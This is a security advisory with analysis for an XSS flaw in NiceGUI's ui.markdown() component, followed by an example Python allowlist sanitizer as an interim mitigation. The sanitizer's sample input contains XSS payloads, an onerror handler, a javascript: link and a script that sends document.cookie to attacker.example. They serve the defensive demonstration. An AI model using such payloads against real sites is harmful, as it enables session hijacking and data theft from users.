CVE-2026-25516 in NiceGUI
Summary
by MITRE • 02/07/2026
NiceGUI is a Python-based UI framework. The ui.markdown() component uses the markdown2 library to convert markdown content to HTML, which is then rendered via innerHTML. By default, markdown2 allows raw HTML to pass through unchanged. This means that if an application renders user-controlled content through ui.markdown(), an attacker can inject malicious HTML containing JavaScript event handlers. Unlike other NiceGUI components that render HTML (ui.html(), ui.chat_message(), ui.interactive_image()), the ui.markdown() component does not provide or require a sanitize parameter, leaving applications vulnerable to XSS attacks. This vulnerability is fixed in 3.7.0.
Analysis
by VulDB Data Team • 02/20/2026
CVE-2026-25516 affects the NiceGUI Python-based UI framework, specifically the ui.markdown() component. The component converts markdown to HTML with the markdown2 library and hands the result to the browser through innerHTML. The core flaw is markdown2's default behaviour of passing raw HTML embedded in the markdown source through to its output unchanged, so any tags and attributes an author writes reach the DOM as markup rather than as text.
The vulnerability materialises when an application passes user-controlled content to ui.markdown() without sanitizing it first. Other NiceGUI components that render HTML, such as ui.html(), ui.chat_message() and ui.interactive_image(), provide or require a sanitize parameter to mitigate XSS; ui.markdown() offers no such parameter. This inconsistency leaves a gap in which attacker-controlled markdown can carry HTML elements with JavaScript event handlers (for example an onerror attribute on an image tag), which the browser then executes in the context of the application's origin. An application is only affected if it renders untrusted input through this component; markdown authored by the application itself is not at issue.
The operational impact is that of any cross-site scripting flaw: script running in the victim's session can steal session tokens or other data visible to the page, perform actions on the user's behalf, or redirect the user to a malicious site. Exploitation requires little effort, since the attacker only needs the ability to submit content that the application later renders with ui.markdown(); no additional attack vector is needed. The issue is therefore most relevant for web applications that accept user-generated content and display it through markdown rendering.
Security professionals should note that this vulnerability maps to CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting'). The mapping to ATT&CK techniques T1213 (Data from Information Repositories) and T1566 (Phishing) covers how a payload may be delivered and what an attacker can do with script execution in the victim's session, rather than the injection itself. The absence of a sanitize parameter in ui.markdown() is a clear deviation from the secure defaults used by the framework's other HTML-rendering components. Organizations should upgrade to NiceGUI version 3.7.0 or later, where the issue is fixed. Until the upgrade is rolled out, administrators should review their code for every place where ui.markdown() receives user-controlled input and add an interim mitigation, such as sanitizing the rendered HTML against an allowlist of tags and attributes, or stripping raw HTML from the input before it is rendered.
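As an added example, not code from NiceGUI, markdown2 or VulDB, the following stdlib-only allowlist sanitizer shows the kind of interim mitigation described above. It assumes the markdown has already been rendered to HTML; the RENDERED string is a constructed stand-in for markdown2 output on attacker-supplied markdown and contains the payload types the advisory describes (an event-handler attribute, a javascript: link and a script element). The sanitize() function, its tag and attribute allowlists and the sample HTML are all illustrative assumptions, not the framework's policy.

```python
"""Allowlist HTML sanitizer for rendered markdown (stdlib only).

Added example, not NiceGUI or markdown2 code. It assumes markdown has
already been rendered to HTML and strips the raw-HTML payloads that
CVE-2026-25516 lets through: event-handler attributes, script/frame
elements and javascript: URLs. The allowlists below are illustrative
assumptions, not the framework's policy.
"""
import re
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {
    "p", "br", "hr", "strong", "em", "code", "pre", "blockquote",
    "ul", "ol", "li", "a", "img", "h1", "h2", "h3", "h4", "h5", "h6",
}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "title"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "hr", "img"}
# Elements whose text content must be dropped too, not just their tags.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}


def _safe_url(value):
    """Reject javascript:, data: and other non-allowlisted schemes.

    Relative URLs (no scheme) pass. Whitespace and control characters are
    removed first because browsers ignore them inside the scheme, so
    "java\\tscript:" would otherwise slip through and still execute.
    """
    v = "".join(ch for ch in (value or "") if ch.isprintable() and not ch.isspace())
    head = re.split(r"[/?#]", v, maxsplit=1)[0].lower()
    if ":" not in head:
        return True
    return head.split(":", 1)[0] in SAFE_SCHEMES


class _Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__()  # convert_charrefs=True: text arrives decoded, we re-escape it
        self.out = []
        self.stack = []      # allowed, non-void tags currently open
        self.skip_depth = 0  # > 0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag (svg, math, ...): drop the tag, keep its text children
        kept = []
        for name, value in attrs:
            # Anything not allowlisted is dropped; this removes on* handlers and style.
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in URL_ATTRS and not _safe_url(value):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag in self.stack:
            # Close everything opened after it as well, keeping the output balanced.
            while True:
                open_tag = self.stack.pop()
                self.out.append(f"</{open_tag}>")
                if open_tag == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def close(self):
        super().close()
        while self.stack:  # close anything the input left open
            self.out.append(f"</{self.stack.pop()}>")


def sanitize(rendered_html):
    """Return rendered_html reduced to the allowlisted tags and attributes."""
    parser = _Sanitizer()
    parser.feed(rendered_html)
    parser.close()
    return "".join(parser.out)


# Constructed stand-in for markdown2 output on attacker-supplied markdown.
RENDERED = (
    '<p>Hello <strong>world</strong> '
    '<img src="x" onerror="alert(document.cookie)"></p>\n'
    '<p><a href="javascript:alert(1)">click</a> '
    '<a href="https://example.com">ok</a></p>\n'
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>\n'
)

if __name__ == "__main__":
    print(sanitize(RENDERED))
```

Sanitizing the rendered output rather than the input keeps legitimate markdown syntax intact; escaping the input with html.escape() before rendering would also turn the `>` of a blockquote into `&gt;` and break it. markdown2 itself also accepts a safe_mode argument ("escape" or "replace") that neutralises all raw HTML, which is the simpler choice when no inline HTML is needed at all.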